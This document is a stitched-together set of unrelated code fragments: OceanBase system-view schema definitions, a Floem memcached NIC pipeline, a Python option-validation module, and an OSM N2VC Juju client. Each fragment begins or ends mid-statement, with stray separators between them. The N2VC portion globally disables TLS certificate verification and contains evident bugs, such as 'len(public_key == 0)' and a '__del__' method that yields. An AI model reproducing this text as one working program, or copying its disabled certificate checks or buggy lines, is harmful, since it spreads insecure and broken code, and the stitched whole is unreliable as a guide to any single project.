CAST(NULL AS VARCHAR2(7)) PREDICATE_EVALUATION,
CAST(NULL AS VARCHAR2(3)) ENCRYPTED,
CAST(NULL AS VARCHAR2(12)) COMPRESS_FOR
FROM
SYS.ALL_VIRTUAL_TENANT_TABLESPACE_REAL_AGENT
WHERE TENANT_ID = EFFECTIVE_TENANT_ID()
""".replace("\n", " ")
)
def_table_schema(
table_name = 'USER_TABLESPACES',
name_postfix = '_ORA',
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25111',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """SELECT
TABLESPACE_NAME,
CAST(NULL AS NUMBER) BLOCK_SIZE,
CAST(NULL AS NUMBER) INITIAL_EXTENT,
CAST(NULL AS NUMBER) NEXT_EXTENT,
CAST(NULL AS NUMBER) MIN_EXTENT,
CAST(NULL AS NUMBER) MAX_EXTENT,
CAST(NULL AS NUMBER) MAX_SIZE,
CAST(NULL AS NUMBER) PCT_INCREASE,
CAST(NULL AS NUMBER) MIN_EXTLEN,
CAST(NULL AS VARCHAR2(9)) STATUS,
CAST(NULL AS VARCHAR2(9)) | |
from floem import *
n_cores = 1
nic_rx_threads = 10
nic_tx_threads = 1
rx_queues = 1
tx_queues = 1
#mode = 'dpdk'
mode = target.CAVIUM
class protocol_binary_request_header_request(State):
magic = Field(Uint(8))
opcode = Field(Uint(8))
keylen = Field(Uint(16))
extlen = Field(Uint(8))
datatype = Field(Uint(8))
status = Field(Uint(16))
bodylen = Field(Uint(32))
opaque = Field(Uint(32))
cas = Field(Uint(64))
# Tell compiler not to generate this struct because it's already declared in some other header file.
def init(self): self.declare = False
class protocol_binary_request_header(State):
request = Field(protocol_binary_request_header_request)
def init(self): self.declare = False
class iokvs_message(State):
ether = Field('struct eth_hdr')
ipv4 = Field('struct ip_hdr')
dup = Field('struct udp_hdr')
mcudp = Field('memcached_udp_header')
mcr = Field(protocol_binary_request_header)
payload = Field(Array(Uint(8)))
def init(self): self.declare = False
CacheGetStart, CacheGetEnd, CacheSetStart, CacheSetEnd, CacheState = \
cache_smart.smart_cache_with_state('MyCache',
(Pointer(Int),'key','keylen'), [(Pointer(Int),'val','vallen')],
var_size=True, hash_value='hash', n_hashes=2**13,
write_policy=Cache.write_back, write_miss=Cache.write_alloc)
class item(State):
next = Field('struct _item')
hv = Field(Uint(32))
vallen = Field(Uint(32))
refcount = Field(Uint(16))
keylen = Field(Uint(16))
flags = Field(Uint(32))
def init(self): self.declare = False
class MyState(CacheState):
pkt = Field(Pointer(iokvs_message), size='sizeof(struct eth_hdr) + sizeof(struct ip_hdr)')
pkt_buff = Field('void*')
it = Field(Pointer(item))
hash = Field(Uint(32))
keylen = Field(Uint(32))
key = Field('void*', size='state->keylen')
vallen = Field(Uint(32))
val = Field('void*', size='state->vallen')
class Schedule(State):
core = Field(Int)
def init(self): self.core = 0
class ItemAllocators(State):
ia = Field('struct item_allocator*')
def init(self):
self.ia = 'get_item_allocators()'
item_allocators = ItemAllocators()
class segments_holder(State):
segbase = Field(Uint(64))
seglen = Field(Uint(64))
offset = Field(Uint(64))
next = Field('struct _segments_holder*')
last = Field('struct _segments_holder*')
class main(Flow):
state = PerPacket(MyState)
class SaveState(Element):
def configure(self):
self.inp = Input(SizeT, "void *", "void *")
self.out = Output()
def impl(self):
self.run_c(r'''
(size_t size, void* pkt, void* buff) = inp();
iokvs_message* m = (iokvs_message*) pkt;
state->pkt = m;
state->pkt_buff = buff;
output { out(); }
''')
class GetPktBuff(Element):
def configure(self):
self.inp = Input()
self.out = Output("void*", "void*")
def impl(self):
self.run_c(r'''
void* pkt = state->pkt;
void* pkt_buff = state->pkt_buff;
output { out(pkt, pkt_buff); }
''')
class CheckPacket(Element):
def configure(self):
self.inp = Input(SizeT, 'void*', 'void*')
self.out = Output(SizeT, 'void*', 'void*')
self.slowpath = Output( 'void*', 'void*')
self.drop = Output('void*', 'void*')
def impl(self):
self.run_c(r'''
(size_t msglen, void* pkt, void* buff) = inp();
iokvs_message* m = (iokvs_message*) pkt;
int type; // 0 = normal, 1 = slow, 2 = drop
if (m->ether.type == htons(ETHERTYPE_IPv4) &&
m->ipv4._proto == 17 &&
memcmp(m->ipv4.dest.addr, settings.localip.addr, sizeof(struct ip_addr)) == 0 &&
m->udp.dest_port == htons(11211) &&
msglen >= sizeof(iokvs_message))
{
uint32_t blen = m->mcr.request.bodylen;
uint32_t keylen = m->mcr.request.keylen;
/* Ensure request is complete */
if (blen < keylen + m->mcr.request.extlen ||
msglen < sizeof(iokvs_message) + blen) {
type = 2;
}
else if (m->mcudp.n_data != htons(1)) {
type = 2;
}
else if (m->mcr.request.opcode != PROTOCOL_BINARY_CMD_GET &&
m->mcr.request.opcode != PROTOCOL_BINARY_CMD_SET) {
type = 2;
}
else {
type = 0;
}
} else {
type = 1;
}
output switch {
case type==0: out(msglen, m, buff);
case type==1: slowpath(m, buff);
else: drop(m, buff);
}
''')
class Classifer(Element):
def configure(self):
self.inp = Input()
self.out_get = Output('uint8_t*', Int)
self.out_set = Output('uint8_t*', Int, Int, 'uint8_t*')
def impl(self):
self.run_c(r'''
uint8_t cmd = state->pkt->mcr.request.opcode;
//printf("receive: %d\n", cmd);
output switch{
case (cmd == PROTOCOL_BINARY_CMD_GET): out_get();
case (cmd == PROTOCOL_BINARY_CMD_SET): out_set();
// else drop
}
''')
class GetKey(ElementOneInOut):
def impl(self):
self.run_c(r'''
state->key = state->pkt->payload + state->pkt->mcr.request.extlen;
output { out(); }''')
class RxScheduler(Element):
def configure(self):
self.inp = Input(Int)
self.out = Output(Int)
def impl(self):
self.run_c(r'''
(int id) = inp();
static __thread int qid = -1;
if(qid == -1) qid = (id * %d) / %d;
qid = (qid + 1) %s %d;
output { out(qid); }
''' % (rx_queues, n_cores, '%', rx_queues))
class TxScheduler(Element):
def configure(self):
self.inp = Input(Int)
self.out = Output(Int)
def impl(self):
self.run_c(r'''
(int id) = inp();
static __thread int qid = -1;
if(qid == -1) qid = (id * %d) / %d;
qid = (qid + 1) %s %d;
output { out(qid); }
''' % (tx_queues, nic_tx_threads, '%', tx_queues))
######################## hash ########################
class JenkinsHash(ElementOneInOut):
def impl(self):
self.run_c(r'''
//state->hash = jenkins_hash(state->key, state->pkt->mcr.request.keylen);
uint32_t *key = state->key;
state->hash = cm_hash4(*key);
//printf("hash = %d\n", hash);
output { out(); }
''')
class QID(ElementOneInOut):
def impl(self):
self.run_c(r'''
state->qid = state->hash %s %d;
output { out(); }
''' % ('%', rx_queues))
class QIDCPU(ElementOneInOut):
def impl(self):
self.run_c(r'''
state->qid = state->hash %s %d;
output { out(); }
''' % ('%', tx_queues))
class HashGet(Element):
def configure(self):
self.inp = Input()
self.out = Output()
def impl(self):
self.run_c(r'''
item* it = hasht_get(state->key, state->keylen, state->hash);
//printf("hash get\n");
state->it = it;
if(it) {
state->val = item_value(it);
state->vallen = it->vallen;
} else {
state->vallen = 0;
}
output { out(); }
''')
class GetResult(Element):
def configure(self):
self.inp = Input()
self.hit = Output()
self.miss = Output()
def impl(self):
self.run_c(r'''
bool yes = (state->vallen > 0);
output switch { case yes: hit(); else: miss(); }
''')
class HashPut(ElementOneInOut):
def impl(self):
self.run_c(r'''
//printf("hash put\n");
if(state->it) hasht_put(state->it, NULL);
output { out(); }
''')
######################## responses ########################
class SizeGetResp(Element):
def configure(self):
self.inp = Input()
self.out = Output(SizeT)
def impl(self):
self.run_c(r'''
//printf("size get\n");
size_t msglen = sizeof(iokvs_message) + 4 + state->vallen;
output { out(msglen); }
''')
class PrepareGetResp(Element):
def configure(self):
self.inp = Input(SizeT, 'void*', 'void*')
self.out = Output(SizeT, Pointer(iokvs_message), 'void*')
def impl(self):
self.run_c(r'''
(size_t msglen, void* pkt, void* pkt_buff) = inp();
iokvs_message *m = pkt;
memcpy(m, state->pkt, sizeof(struct eth_hdr) + sizeof(struct ip_hdr));
m->mcr.request.magic = PROTOCOL_BINARY_RES;
m->mcr.request.opcode = PROTOCOL_BINARY_CMD_GET;
m->mcr.request.datatype = PROTOCOL_BINARY_RAW_BYTES;
m->mcr.request.status = PROTOCOL_BINARY_RESPONSE_SUCCESS;
m->mcr.request.keylen = 0;
m->mcr.request.extlen = 4;
m->mcr.request.bodylen = 4;
*((uint32_t *)m->payload) = 0;
m->mcr.request.bodylen = 4 + state->vallen;
memcpy(m->payload + 4, state->val, state->vallen);
output { out(msglen, m, pkt_buff); }
''')
class SizeGetNullResp(Element):
def configure(self):
self.inp = Input()
self.out = Output(SizeT)
def impl(self):
self.run_c(r'''
//printf("size get null\n");
size_t msglen = sizeof(iokvs_message) + 4;
output { out(msglen); }
''')
class PrepareGetNullResp(Element):
def configure(self):
self.inp = Input(SizeT, 'void*', 'void*')
self.out = Output(SizeT, Pointer(iokvs_message), 'void*')
def impl(self):
self.run_c(r'''
(size_t msglen, void* pkt, void* pkt_buff) = inp();
iokvs_message *m = pkt;
memcpy(m, state->pkt, sizeof(struct eth_hdr) + sizeof(struct ip_hdr));
m->mcr.request.magic = PROTOCOL_BINARY_RES;
m->mcr.request.opcode = PROTOCOL_BINARY_CMD_GET;
m->mcr.request.datatype = PROTOCOL_BINARY_RAW_BYTES;
m->mcr.request.status = PROTOCOL_BINARY_RESPONSE_KEY_ENOENT;
m->mcr.request.keylen = 0;
m->mcr.request.extlen = 4;
m->mcr.request.bodylen = 4;
*((uint32_t *)m->payload) = 0;
output { out(msglen, m, pkt_buff); }
''')
class SizeSetResp(Element):
def configure(self):
self.inp = Input()
self.out = Output(SizeT)
def impl(self):
self.run_c(r'''
//printf("size set\n");
size_t msglen = sizeof(iokvs_message) + 4;
output { out(msglen); }
''')
class SizePktBuffSetResp(Element):
def configure(self):
self.inp = Input()
self.out = Output(SizeT, 'void*', 'void*')
def impl(self):
self.run_c(r'''
size_t msglen = sizeof(iokvs_message) + 4;
void* pkt = state->pkt;
void* pkt_buff = state->pkt_buff;
output { out(msglen, pkt, pkt_buff); }
''')
class PrepareSetResp(Element):
def configure(self, status):
self.inp = Input(SizeT, 'void*', 'void*')
self.out = Output(SizeT, Pointer(iokvs_message), 'void*')
self.status = status
# PROTOCOL_BINARY_RESPONSE_SUCCESS
# PROTOCOL_BINARY_RESPONSE_ENOMEM
def impl(self):
self.run_c(r'''
(size_t msglen, void* pkt, void* pkt_buff) = inp();
iokvs_message *m = pkt;
memcpy(m, state->pkt, sizeof(struct eth_hdr) + sizeof(struct ip_hdr));
m->mcr.request.magic = PROTOCOL_BINARY_RES;
m->mcr.request.opcode = PROTOCOL_BINARY_CMD_SET;
m->mcr.request.datatype = PROTOCOL_BINARY_RAW_BYTES;
m->mcr.request.status = %s;
m->mcr.request.keylen = 0;
m->mcr.request.extlen = 0;
m->mcr.request.bodylen = 0;
output { out(msglen, m, pkt_buff); }
''' % self.status)
class PktBuff(Element):
def configure(self):
self.inp = Input()
self.out = Output('void*', 'void*')
def impl(self):
self.run_c(r'''
void* pkt = state->pkt;
void* pkt_buff = state->pkt_buff;
output { out(pkt, pkt_buff); }
''')
class PrepareHeader(Element):
def configure(self):
self.inp = Input(SizeT, Pointer(iokvs_message), "void *")
self.out = Output(SizeT, "void *", "void *")
def impl(self):
self.run_c(r'''
(size_t msglen, iokvs_message* m, void* buff) = inp();
struct eth_addr mymac = m->ether.dest;
m->ether.dest = m->ether.src;
m->ether.src = mymac;
m->ipv4.dest = m->ipv4.src;
m->ipv4.src = settings.localip;
m->ipv4._len = htons(msglen - offsetof(iokvs_message, ipv4));
m->ipv4._ttl = 64;
m->ipv4._chksum = 0;
m->udp.dest_port = m->udp.src_port;
m->udp.src_port = htons(11211);
m->udp.len = htons(msglen - offsetof(iokvs_message, udp));
m->udp.cksum = 0;
output { out(msglen, (void*) m, buff); }
''')
class HandleArp(Element):
def configure(self):
self.inp = Input("void *", "void *")
self.out = Output(SizeT, "void *", "void *")
self.drop = Output("void *", "void *")
def impl(self):
self.run_c(r'''
(void* pkt, void* buff) = inp();
iokvs_message* msg = (iokvs_message*) pkt;
struct arp_hdr *arp = (struct arp_hdr *) (&msg->ether + 1);
int resp = 0;
/* Currently we're only handling ARP here */
if (msg->ether.type == htons(ETHERTYPE_ARP) &&
arp->arp_hrd == htons(ARPHRD_ETHER) && arp->arp_pln == 4 &&
arp->arp_op == htons(ARPOP_REQUEST) && arp->arp_hln == 6 &&
memcmp(arp->arp_tip.addr, settings.localip.addr, sizeof(struct ip_addr)) == 0
)
{
printf("Responding to ARP\n");
resp = 1;
struct eth_addr mymac = msg->ether.dest;
msg->ether.dest = msg->ether.src;
msg->ether.src = mymac; // TODO
arp->arp_op = htons(ARPOP_REPLY);
arp->arp_tha = arp->arp_sha;
arp->arp_sha = mymac;
arp->arp_tip = arp->arp_sip;
arp->arp_sip = settings.localip;
}
output | |
<filename>lib/tpn/invariant.py<gh_stars>1-10
#===============================================================================
# Imports
#===============================================================================
import os
import re
import inspect
import datetime
import linecache
import itertools
from .util import (
endswith,
)
from os.path import (
isdir,
isfile,
exists,
abspath,
dirname,
basename,
normpath,
)
#===============================================================================
# Globals
#===============================================================================
SUFFIXES = (
'Option',
'Error',
'Arg',
)
# Quick hack for 3.x support.
try:
STRING_TYPES = (str, unicode)
except NameError:
STRING_TYPES = (str,)
#===============================================================================
# Base Invariant Class
#===============================================================================
class Invariant(BaseException):
_arg = None
_type = None
_name = None
_help = None
_maxlen = None
_minlen = None
_action = None
_default = None
_metavar = None
_opt_long = None
_opt_type = None
_opt_short = None
_mandatory = True
_type_desc = None
_capitalized_name = None
__filter = lambda _, n: (n[0] != '_' and n not in ('message', 'args'))
__keys = lambda _, n: (
n[0] != '_' and n not in {
'args',
'actual',
'message',
'expected',
}
)
def __init__(self, obj, name):
self._obj = obj
self._name = name
self.actual = None
self.dst_attr = None
self.dst_value = None
self._existing = None
self._existing_str = None
n = self.__class__.__name__.replace('Error', '').lower()
if n.endswith('arg'):
n = n[:-3]
if hasattr(self, '_regex'):
self._pattern = re.compile(self._regex)
if not hasattr(self, 'expected'):
self.expected = "%s to match regex '%s'" % (n, self._regex)
self._test = self._test_regex
if not hasattr(self, '_test'):
self._test = self._test_simple_equality
if not self._opt_type and self._type:
if self._type in STRING_TYPES:
self._opt_type = 'string'
elif self._type == int:
self._opt_type = 'int'
elif self._type == float:
self._opt_type = 'float'
elif self._type == complex:
self._opt_type = 'complex'
if not self._type_desc and self._opt_type:
self._type_desc = self._opt_type
if not self._type_desc:
self._type_desc = self._type.__name__
if not self._metavar:
self._metavar = name.upper()
s = None
l = None
long_opts = obj._long_opts
short_opts = obj._short_opts
if self._arg:
a = self._arg
assert len(a) >= 2, a
if '/' in a:
(s, l) = a.split('/')
if s.startswith('-'):
s = s[1:]
if l.startswith('--'):
l = l[2:]
assert s, s
assert l, l
else:
if a[0] == '-' and a[1] != '-':
s = a[1:]
else:
assert a.startswith('--') and len(a) >= 4, a
l = a[2:]
else:
l = name.replace('_', '-')
chars = [ (c, c.upper()) for c in list(name) ]
for c in itertools.chain.from_iterable(chars):
if c not in short_opts:
s = c
break
if l:
assert l not in long_opts, (l, long_opts)
long_opts[l] = self
if s:
assert s not in short_opts, (s, short_opts)
short_opts[s] = self
self._opt_long = l
self._opt_short = s
tokens = re.findall('[A-Z][^A-Z]*', self.__class__.__name__)
if tokens[-1] == 'Error':
tokens = tokens[:-1]
elif tokens[-1] == 'Arg':
tokens = tokens[:-1]
self._capitalized_name = ' '.join(tokens)
def _test_regex(self):
return bool(self._pattern.match(self.actual))
def _test_simple_equality(self):
return (self.actual == self.expected)
def __save(self, value, force, retval):
assert force in (True, False)
assert retval in (True, False)
try:
setattr(self._obj, '_' + self._name, value)
except AttributeError:
if force:
raise
return retval
def _try_save(self, value, retval=True):
force = False
return self.__save(value, force, retval)
def _save(self, value, retval=True):
force = True
return self.__save(value, force, retval)
def __check_existing(self):
obj = self._obj
name = self._name
actual = self.actual
check_existing = (
not hasattr(self, '_check_existing_') or (
hasattr(self, '_check_existing_') and
self._check_existing_
)
)
has_existing = (
hasattr(obj, '_existing') and
obj._existing
)
if not has_existing:
return
ex_obj = obj._existing
existing = getattr(ex_obj, name)
existing_str = existing
actual_str = str(actual)
if isiterable(existing):
existing_str = ','.join(str(e) for e in existing)
elif isinstance(existing, datetime.date):
existing_str = existing.strftime(self._date_format)
elif isinstance(existing, datetime.datetime):
existing_str = existing.strftime(self._datetime_format)
elif not isinstance(existing, str):
existing_str = str(existing)
self._existing = existing
self._existing_str = existing_str
if not check_existing:
return
if not (existing_str != actual_str):
message = "%s already has a value of '%s'"
BaseException.__init__(self, message % (name, actual_str))
raise self
def _validate(self, new_value):
self.actual = new_value
self.__check_existing()
result = self._test()
if result not in (True, False):
raise RuntimeError(
"invalid return value from %s's validation "
"routine, expected True/False, got: %s (did "
"you forget to 'return True'?)" % (self._name, repr(result))
)
if not result:
if hasattr(self, 'message') and self.message:
message = self.message
prefix = ''
else:
keys = [
'expected',
'actual'
] + sorted(filter(self.__keys, dir(self)))
f = lambda k: 'got' if k == 'actual' else k
items = ((f(k), repr(getattr(self, k))) for k in keys)
message = ', '.join('%s: %s' % (k, v) for (k, v) in items)
prefix = "%s is invalid: " % self._name
BaseException.__init__(self, prefix + message)
raise self
obj = self._obj
dst_attr = self.dst_attr or ('_' + self._name)
if self.dst_value and hasattr(obj, dst_attr):
setattr(obj, dst_attr, self.dst_value)
#===============================================================================
# Common Invariants
#===============================================================================
class BoolInvariant(Invariant):
expected = None
_type = bool
_metavar = None
_action = 'store_true'
def _test(self):
return True
class StringInvariant(Invariant):
_type = str
_type_desc = 'string'
_maxlen = 1024
_minlen = 2
@property
def expected(self):
assert isinstance(self._maxlen, int), (self._maxlen,type(self._maxlen))
assert self._maxlen > 0, self._maxlen
return '%s with length between %d and %d characters' % (
self._type_desc,
self._minlen,
self._maxlen
)
def _test(self):
if not isinstance(self.actual, self._type):
return False
l = len(self.actual)
return (
l >= self._minlen and
l <= self._maxlen
)
try:
class UnicodeInvariant(StringInvariant):
_type = unicode
_type_desc = 'unicode string'
except NameError:
UnicodeInvariant = StringInvariant
class PositiveIntegerInvariant(Invariant):
_type = int
_min = 1
_max = None
expected = "an integer greater than 0"
def _test(self):
try:
i = int(self.actual)
if self._min:
assert i >= self._min
if self._max:
assert i <= self._max
return self._try_save(i)
except:
return False
class AscendingCSVSepPositiveIntegersInvariant(Invariant):
_type = str
expected = (
"one or more positive integers separated by ',' "
"in ascending order"
)
def _test(self):
numbers = None
try:
numbers = [ int(i) for i in self.actual.split(',') ]
sorted_numbers = sorted(numbers)
assert numbers == sorted_numbers
except (ValueError, AssertionError):
return False
assert numbers
try:
setattr(self._obj, '_' + self._name, numbers)
except AttributeError:
pass
return True
class NonNegativeIntegerInvariant(Invariant):
_type = int
expected = "an integer greater than or equal to 0"
def _test(self):
try:
return (int(self.actual) >= 0)
except:
return False
class FloatInvariant(Invariant):
_type = float
_min = None
_max = None
expected = "a float"
def _test(self):
try:
f = float(self.actual)
if self._min:
assert f >= self._min
if self._max:
assert f <= self._max
return True
except:
return False
class NonEmptyDictInvariant(Invariant):
_type = dict
expected = "a non-empty dict"
def _test(self):
try:
d = self.actual
return isinstance(d, dict) and d
except:
return False
class MonthDayRangeInvariant(StringInvariant):
_minlen = 3
_maxlen = 5
expected = "a month range in the format n-m, i.e. '1-15'"
def _test(self):
if not StringInvariant._test(self):
return False
try:
(s, e) = (int(i) for i in self.actual.split('-'))
assert s < e
assert s >= 1 and s <= 27
assert e >= 2 and e <= 31
except:
return False
return True
class SetInvariant(Invariant):
_type = str
_expected_fmt = "a member of the following set: %s"
def _test(self):
set_str = ', '.join(("'%s'" % s for s in self._set))
self.expected = self._expected_fmt % set_str
try:
self.dst_value = set((self.actual,))
assert ((self._set & self.dst_value) == self.dst_value)
except (ValueError, AssertionError):
return False
return True
class MultipleSetInvariant(Invariant):
_type = str
_expected_fmt = (
"one or more values (csv separated if more than one) "
"from the following set: %s"
)
def _test(self):
set_str = ', '.join(("'%s'" % s for s in self._set))
self.expected = self._expected_fmt % set_str
try:
self.dst_value = set(self.actual.split(','))
assert ((self._set & self.dst_value) == self.dst_value)
except (ValueError, AssertionError):
return False
return True
class PathInvariant(StringInvariant):
_minlen = 1
_maxlen = 1024
_allow_dash = False
_endswith = None
@property
def expected(self):
if self._endswith:
return "a valid, existing path ending with '%s'" % self._endswith
else:
return "a valid path name"
def _test(self):
if not StringInvariant._test(self):
return False
if self._endswith and not self.actual.endswith(self._endswith):
return False
if self._allow_dash and self.actual == '-':
return True
p = abspath(self.actual)
if not isfile(p):
return False
return self._try_save(p)
class YMDPathInvariant(PathInvariant):
def _test(self):
dst_name = '_' + self._name + '_ymd'
assert hasattr(self._obj, dst_name), dst_name
if not PathInvariant._test(self):
return False
path = self.actual
n = basename(path)
ix = n.find('2')
ymd = n[ix:ix+len('yyyy-mm-dd')]
setattr(self._obj, dst_name, ymd)
return True
class OutPathInvariant(StringInvariant):
expected = "a valid path name (path does not have to exist)"
# If the base directory doesn't exist and _mkdir is True, create the
# directory.
_mkdir = True
_minlen = 1
_maxlen = 1024
def _test(self):
if not StringInvariant._test(self):
return False
try:
path = self.actual
| |
# Copyright 2019 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import base64
import binascii
import logging
import os.path
import re
import shlex
import ssl
import subprocess
from juju.client import client
from juju.controller import Controller
from juju.errors import JujuAPIError, JujuError
from juju.model import ModelObserver
import n2vc.exceptions
from n2vc.provisioner import SSHProvisioner
# import time
# FIXME: this should load the juju inside or modules without having to
# explicitly install it. Check why it's not working.
# Load our subtree of the juju library
# path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
# path = os.path.join(path, "modules/libjuju/")
# if path not in sys.path:
# sys.path.insert(1, path)
# We might need this to connect to the websocket securely, but test and verify.
try:
ssl._create_default_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python doesn't verify by default (see pep-0476)
# https://www.python.org/dev/peps/pep-0476/
pass
# Custom exceptions
# Deprecated. Please use n2vc.exceptions namespace.
class JujuCharmNotFound(Exception):
"""The Charm can't be found or is not readable."""
class JujuApplicationExists(Exception):
"""The Application already exists."""
class N2VCPrimitiveExecutionFailed(Exception):
"""Something failed while attempting to execute a primitive."""
class NetworkServiceDoesNotExist(Exception):
"""The Network Service being acted against does not exist."""
class PrimitiveDoesNotExist(Exception):
"""The Primitive being executed does not exist."""
# Quiet the debug logging
logging.getLogger("websockets.protocol").setLevel(logging.INFO)
logging.getLogger("juju.client.connection").setLevel(logging.WARN)
logging.getLogger("juju.model").setLevel(logging.WARN)
logging.getLogger("juju.machine").setLevel(logging.WARN)
class VCAMonitor(ModelObserver):
"""Monitor state changes within the Juju Model."""
log = None
def __init__(self, ns_name):
self.log = logging.getLogger(__name__)
self.ns_name = ns_name
self.applications = {}
def AddApplication(self, application_name, callback, *callback_args):
if application_name not in self.applications:
self.applications[application_name] = {
"callback": callback,
"callback_args": callback_args,
}
def RemoveApplication(self, application_name):
if application_name in self.applications:
del self.applications[application_name]
async def on_change(self, delta, old, new, model):
"""React to changes in the Juju model."""
if delta.entity == "unit":
# Ignore change events from other applications
if delta.data["application"] not in self.applications.keys():
return
try:
application_name = delta.data["application"]
callback = self.applications[application_name]["callback"]
callback_args = self.applications[application_name]["callback_args"]
if old and new:
# Fire off a callback with the application state
if callback:
callback(
self.ns_name,
delta.data["application"],
new.workload_status,
new.workload_status_message,
*callback_args,
)
if old and not new:
# This is a charm being removed
if callback:
callback(
self.ns_name,
delta.data["application"],
"removed",
"",
*callback_args,
)
except Exception as e:
self.log.debug("[1] notify_callback exception: {}".format(e))
elif delta.entity == "action":
# TODO: Decide how we want to notify the user of actions
# uuid = delta.data['id'] # The Action's unique id
# msg = delta.data['message'] # The output of the action
#
# if delta.data['status'] == "pending":
# # The action is queued
# pass
# elif delta.data['status'] == "completed""
# # The action was successful
# pass
# elif delta.data['status'] == "failed":
# # The action failed.
# pass
pass
########
# TODO
#
# Create unique models per network service
# Document all public functions
class N2VC:
def __init__(
self,
log=None,
server="127.0.0.1",
port=17070,
user="admin",
secret=None,
artifacts=None,
loop=None,
juju_public_key=None,
ca_cert=None,
api_proxy=None,
):
"""Initialize N2VC
Initializes the N2VC object, allowing the caller to interoperate with the VCA.
:param log obj: The logging object to log to
:param server str: The IP Address or Hostname of the Juju controller
:param port int: The port of the Juju Controller
:param user str: The Juju username to authenticate with
:param secret str: The Juju password to authenticate with
:param artifacts str: The directory where charms required by a vnfd are
stored.
:param loop obj: The loop to use.
:param juju_public_key str: The contents of the Juju public SSH key
:param ca_cert str: The CA certificate to use to authenticate
:param api_proxy str: The IP of the host machine
:Example:
client = n2vc.vnf.N2VC(
log=log,
server='10.1.1.28',
port=17070,
user='admin',
secret='admin',
artifacts='/app/storage/myvnf/charms',
loop=loop,
juju_public_key='<contents of the juju public key>',
ca_cert='<contents of CA certificate>',
api_proxy='192.168.1.155'
)
"""
# Initialize instance-level variables
self.api = None
self.log = None
self.controller = None
self.connecting = False
self.authenticated = False
self.api_proxy = api_proxy
if log:
self.log = log
else:
self.log = logging.getLogger(__name__)
# For debugging
self.refcount = {
"controller": 0,
"model": 0,
}
self.models = {}
# Model Observers
self.monitors = {}
# VCA config
self.hostname = ""
self.port = 17070
self.username = ""
self.secret = ""
self.juju_public_key = juju_public_key
if juju_public_key:
self._create_juju_public_key(juju_public_key)
else:
self.juju_public_key = ""
# TODO: Verify ca_cert is valid before using. VCA will crash
# if the ca_cert isn't formatted correctly.
def base64_to_cacert(b64string):
"""Convert the base64-encoded string containing the VCA CACERT.
The input string....
"""
try:
cacert = base64.b64decode(b64string).decode("utf-8")
cacert = re.sub(r"\\n", r"\n", cacert,)
except binascii.Error as e:
self.log.debug("Caught binascii.Error: {}".format(e))
raise n2vc.exceptions.N2VCInvalidCertificate("Invalid CA Certificate")
return cacert
self.ca_cert = None
if ca_cert:
self.ca_cert = base64_to_cacert(ca_cert)
# Quiet websocket traffic
logging.getLogger("websockets.protocol").setLevel(logging.INFO)
logging.getLogger("juju.client.connection").setLevel(logging.WARN)
logging.getLogger("model").setLevel(logging.WARN)
# logging.getLogger('websockets.protocol').setLevel(logging.DEBUG)
self.log.debug("JujuApi: instantiated")
self.server = server
self.port = port
self.secret = secret
if user.startswith("user-"):
self.user = user
else:
self.user = "user-{}".format(user)
self.endpoint = "%s:%d" % (server, int(port))
self.artifacts = artifacts
self.loop = loop or asyncio.get_event_loop()
def __del__(self):
"""Close any open connections."""
yield self.logout()
def _create_juju_public_key(self, public_key):
"""Recreate the Juju public key on disk.
Certain libjuju commands expect to be run from the same machine as Juju
is bootstrapped to. This method will write the public key to disk in
that location: ~/.local/share/juju/ssh/juju_id_rsa.pub
"""
# Make sure that we have a public key before writing to disk
if public_key is None or len(public_key) == 0:
if "OSM_VCA_PUBKEY" in os.environ:
public_key = os.getenv("OSM_VCA_PUBKEY", "")
if len(public_key == 0):
return
else:
return
path = "{}/.local/share/juju/ssh".format(os.path.expanduser("~"),)
if not os.path.exists(path):
os.makedirs(path)
with open("{}/juju_id_rsa.pub".format(path), "w") as f:
f.write(public_key)
def notify_callback(
self,
model_name,
application_name,
status,
message,
callback=None,
*callback_args
):
try:
if callback:
callback(
model_name, application_name, status, message, *callback_args,
)
except Exception as e:
self.log.error("[0] notify_callback exception {}".format(e))
raise e
return True
# Public methods
async def Relate(self, model_name, vnfd):
"""Create a relation between the charm-enabled VDUs in a VNF.
The Relation mapping has two parts: the id of the vdu owning the endpoint, and
the name of the endpoint.
vdu:
...
vca-relationships:
relation:
- provides: dataVM:db
requires: mgmtVM:app
This tells N2VC that the charm referred to by the dataVM vdu offers a relation
named 'db', and the mgmtVM vdu
has an 'app' endpoint that should be connected to a database.
:param str ns_name: The name of the network service.
:param dict vnfd: The parsed yaml VNF descriptor.
"""
# Currently, the call to Relate() is made automatically after the
# deployment of each charm; if the relation depends on a charm that
# hasn't been deployed yet, the call will fail silently. This will
# prevent an API breakage, with the intent of making this an explicitly
# required call in a more object-oriented refactor of the N2VC API.
configs = []
vnf_config = vnfd.get("vnf-configuration")
if vnf_config:
juju = vnf_config["juju"]
if juju:
configs.append(vnf_config)
for vdu in vnfd["vdu"]:
vdu_config = vdu.get("vdu-configuration")
if vdu_config:
juju = vdu_config["juju"]
if juju:
configs.append(vdu_config)
def _get_application_name(name):
"""Get the application name that's mapped to a vnf/vdu."""
vnf_member_index = 0
vnf_name = vnfd["name"]
for vdu in vnfd.get("vdu"):
# Compare the named portion of the relation to the vdu's id
if vdu["id"] == name:
application_name = self.FormatApplicationName(
model_name, vnf_name, str(vnf_member_index),
)
return application_name
else:
vnf_member_index += 1
return None
# Loop through relations
for cfg in configs:
if "juju" in cfg:
juju = cfg["juju"]
if (
"vca-relationships" in juju
and "relation" in juju["vca-relationships"]
):
for rel in juju["vca-relationships"]["relation"]:
try:
# get the application name for the provides
(name, endpoint) = rel["provides"].split(":")
application_name = _get_application_name(name)
provides = "{}:{}".format(application_name, endpoint)
# get the application name for thr requires
(name, endpoint) = rel["requires"].split(":")
application_name = _get_application_name(name)
requires = "{}:{}".format(application_name, endpoint)
self.log.debug(
"Relation: {} <-> {}".format(provides, requires)
)
await self.add_relation(
model_name, provides, requires,
)
except Exception as e:
self.log.debug("Exception: {}".format(e))
return
